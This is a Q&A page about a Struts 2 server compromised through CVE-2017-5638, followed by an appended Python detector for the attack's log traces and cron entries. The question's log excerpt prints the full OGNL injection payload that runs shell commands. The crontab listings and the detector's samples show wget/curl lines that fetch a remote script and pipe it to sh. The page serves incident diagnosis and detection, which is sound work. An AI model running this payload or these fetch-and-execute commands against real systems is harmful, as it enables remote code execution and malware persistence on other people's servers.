Linux   Published: 2022-04-01   Site: 大佬教程 code.js-code.com
linux – Shell script attack on an Apache server via a cron job of unknown origin

Overview

While running a project war on an Apache Tomcat server, I found that the server had been compromised.

Then an unknown cron job was running, like this:

[root@App2 tmp]# crontab -l -u tomcat
*/11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh
*/12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh

The downloaded logo.jpg contains a shell script that downloads malware.

I found similar issues on the sites below:

https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/

https://security.stackexchange.com/questions/160068/kworker34-malware-on-linux

I cannot find the source of this cron scheduler anywhere in the code.

I would like to know if anyone has encountered this problem,
and how to find the source of the scheduler in the code.

Note:

I am working on a Java (Struts 2) JSP / JavaScript / jQuery web project.

Every time I start my Tomcat with the project's war file this scheduler is running, but I cannot find any such scheduler in my code.

I found the following lines in the log file:

[INFO] 2017-06-02 17:00:41,564 org.apache.struts2.dispatcher.Dispatcher info - Unable to find 'struts.multipart.saveDir' property setting. Defaulting to javax.servlet.context.tempdir
[DEBUG] 2017-06-02 17:00:41,565 org.apache.struts2.dispatcher.Dispatcher debug - saveDir=/opt/tomcat/work/Catalina/localhost/MyApplication
[WARN] 2017-06-02 17:00:41,572 org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest warn - Unable to parse request
org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
                (#_memberAccess?(#_memberAccess=#dm):
                ((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
                (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
                (#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
                (#context.setMemberAccess(#dm)))).
                (#cmd='echo "*/11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh\n*/12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh" | crontab -').
                (#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).
                (#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).
                (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).
                (#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).
                (@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
    at org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:908)
    at org.apache.commons.fileupload.FileUploadBase.getItemIterator(FileUploadBase.java:331)
    at org.apache.commons.fileupload.FileUploadBase.parseRequest(FileUploadBase.java:351)
    at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parseRequest(JakartaMultiPartRequest.java:189)
    at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processUpload(JakartaMultiPartRequest.java:127)
    at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parse(JakartaMultiPartRequest.java:92)
    at org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper.<init>(MultiPartRequestWrapper.java:81)
    at org.apache.struts2.dispatcher.Dispatcher.wrapRequest(Dispatcher.java:779)
    at org.apache.struts2.dispatcher.ng.PrepareOperations.wrapRequest(PrepareOperations.java:134)
    at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:83)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:198)
    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96)
    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:478)
    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:140)
    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:80)
    at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:624)
    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:87)
    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:342)
    at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:799)
    at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
    at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:861)
    at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1455)
    at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:745)
[DEBUG] 2017-06-02 17:00:41,574 org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest debug - Preparing error message for key: [struts.messages.upload.error.InvalidContentTypeException]
[DEBUG] 2017-06-02 17:00:41,587 com.opensymphony.xwork2.conversion.impl.InstantiatingNullHandler debug - Entering nullPropertyValue [target=[com.opensymphony.xwork2.DefaultTextProvider@6e817b9a],property=struts]
[DEBUG] 2017-06-02 17:00:41,625 com.opensymphony.xwork2.conversion.impl.InstantiatingNullHandler debug - Entering nullMethodResult

Solution

After the OP added the logs it is clear that the problem is the remote code execution vulnerability in Struts 2 (CVE-2017-5638).

Some additional links:

> New Struts2 Remote Code Execution exploit caught in the wild.
> CVE-2017-5638 – Apache Struts2 S2-045

The solution is to upgrade Struts to version 2.3.32 or 2.5.10.1.
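As an added example (not part of the original question or answer, and not Struts project code), the following Python script looks for the two artefacts this thread describes from the defender's side: the S2-045 indicator in Struts log output, where the rejected Content-Type header is echoed back in the InvalidContentTypeException message beginning with an OGNL expression, and crontab entries that pipe downloaded content straight into a shell. The log excerpt and crontab listing embedded in it are constructed for the example and abridged from the shape shown above; 198.51.100.7 is a documentation address, not a real indicator, and the function names are the example's own.

```python
"""Added example: detect the S2-045 (CVE-2017-5638) log indicator and the
cron entries it installed, as described in the question above.
All sample data is constructed; 198.51.100.7 is a TEST-NET-2 documentation address."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Struts logs this fragment when the multipart parser rejects a request; the
# attacker-controlled Content-Type header follows it verbatim.
CT_HEADER_RE = re.compile(r"content type header is\s*", re.IGNORECASE)

# OGNL constructs that never belong in a Content-Type header.
OGNL_MARKERS = (
    "#_memberAccess",
    "@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS",
    "getExcludedPackageNames",
    "java.lang.ProcessBuilder",
)
CMD_RE = re.compile(r"#cmd='((?:[^'\\]|\\.)*)'")             # (#cmd='...') in the expression
ECHO_CRONTAB_RE = re.compile(r'^echo\s+"(.*)"\s*\|\s*crontab\s+-$')  # echo "..." | crontab -
CRON_PIPE_TO_SH_RE = re.compile(r"\b(?:wget|curl)\b[^|\n]*\|\s*(?:ba)?sh\b")  # download piped to sh


@dataclass
class Finding:
    kind: str                        # "s2-045-ognl" or "cron-pipe-to-shell"
    evidence: str                    # the OGNL expression or the cron line
    markers: list[str] = field(default_factory=list)
    command: str | None = None       # shell command carried by the expression, if any


def extract_ognl_expression(text: str, start: int) -> str | None:
    """Return the brace-balanced %{...} expression beginning at text[start], else None."""
    if not text.startswith("%{", start):
        return None
    depth = 0
    for i in range(start + 1, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
    return None  # unbalanced braces: truncated log line


def scan_struts_log(log_text: str) -> list[Finding]:
    """Flag every rejected Content-Type header that carries an OGNL expression."""
    findings: list[Finding] = []
    for m in CT_HEADER_RE.finditer(log_text):
        expr = extract_ognl_expression(log_text, m.end())
        if expr is None:
            continue
        # The long header is wrapped across indented continuation lines; rejoin it.
        joined = "".join(line.strip() for line in expr.splitlines())
        markers = [mk for mk in OGNL_MARKERS if mk in joined]
        if markers:
            cmd = CMD_RE.search(joined)
            findings.append(Finding("s2-045-ognl", joined, markers, cmd.group(1) if cmd else None))
    return findings


def planted_cron_lines(command: str) -> list[str]:
    """Cron lines an `echo "..." | crontab -` command installs (literal '\\n' separates them)."""
    m = ECHO_CRONTAB_RE.match(command.strip())
    if not m:
        return []
    return [ln for ln in m.group(1).replace("\\n", "\n").splitlines() if ln.strip()]


def audit_crontab(crontab_text: str) -> list[Finding]:
    """Flag `crontab -l` output lines that pipe remote content into a shell."""
    return [Finding("cron-pipe-to-shell", line.strip())
            for line in crontab_text.splitlines()
            if line.strip() and not line.lstrip().startswith("#") and CRON_PIPE_TO_SH_RE.search(line)]


# Constructed, abridged log excerpt in the shape of the one quoted in the question.
SAMPLE_LOG = """\
[WARN] 2017-06-02 17:00:41,572 org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest warn - Unable to parse request
org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
                (#_memberAccess?(#_memberAccess=#dm):(#context.setMemberAccess(#dm))).
                (#cmd='echo "*/11 * * * * wget -O - -q http://198.51.100.7/pics/logo.jpg|sh" | crontab -').
                (#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})).(#process=#p.start())}
    at org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:908)
[WARN] 2017-06-02 17:05:12,001 org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest warn - Unable to parse request
org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is text/plain
"""

# Constructed `crontab -l -u tomcat` output: one legitimate job, two planted ones.
SAMPLE_CRONTAB = """\
0 3 * * * /opt/tomcat/bin/rotate-logs.sh
*/11 * * * * wget -O - -q http://198.51.100.7/pics/logo.jpg|sh
*/12 * * * * curl http://198.51.100.7/pics/logo.jpg|sh
"""

if __name__ == "__main__":
    for f in scan_struts_log(SAMPLE_LOG):
        print(f"[{f.kind}] markers={f.markers}")
        print(f"  command:  {f.command}")
        print(f"  installs: {planted_cron_lines(f.command or '')}")
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{f.kind}] {f.evidence}")
```

The second, benign `text/plain` header in the sample is rejected by the multipart parser too but produces no finding, which is the point of matching on the `%{` expression and its OGNL markers rather than on the exception alone. Correlating the command extracted from the log with the `crontab -l` output ties the persistence mechanism back to the request that installed it; on a real host the same scan would be run over the full catalina.out and every user's crontab.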
